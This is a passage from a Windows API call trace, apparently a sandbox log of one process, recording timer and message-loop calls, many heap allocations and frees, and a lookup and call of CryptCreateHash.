(lpMsg=0x144eb54) returned 0x0 [0132.100] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0132.100] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0132.100] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0132.100] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0132.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43925a8 [0132.101] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43925a8 | out: hHeap=0x1780000) returned 1 [0132.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae08 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0132.101] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0132.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0132.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0132.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0132.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0132.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0132.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0132.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0132.102] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0132.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0132.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caeb0 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0132.102] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0132.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0132.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0132.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0132.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0132.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0132.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0132.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0132.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0132.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0132.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0132.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0132.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0132.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0132.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0132.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0132.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0132.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0132.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0132.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0132.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0132.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0132.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0132.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0132.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0132.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0132.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0132.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0132.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0132.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0132.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0132.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0132.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0132.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0132.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0132.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0132.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0132.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0132.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0132.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0132.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0132.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0132.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0132.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0132.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0132.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0132.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0132.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0132.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0132.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0132.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0132.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cb048, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0132.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0132.106] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0132.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0132.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0132.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0132.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0132.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0132.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0132.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0132.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0132.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0132.106] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0132.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0132.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e18 [0132.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0132.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0132.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0132.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0132.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0132.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0132.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0132.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0132.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0132.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0132.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0132.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0132.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0132.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0132.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0132.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0132.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0132.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0132.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0132.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0132.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0132.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0132.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0132.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0132.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0132.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0132.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0132.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0132.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0132.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0132.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0132.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0132.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0132.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0132.109] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 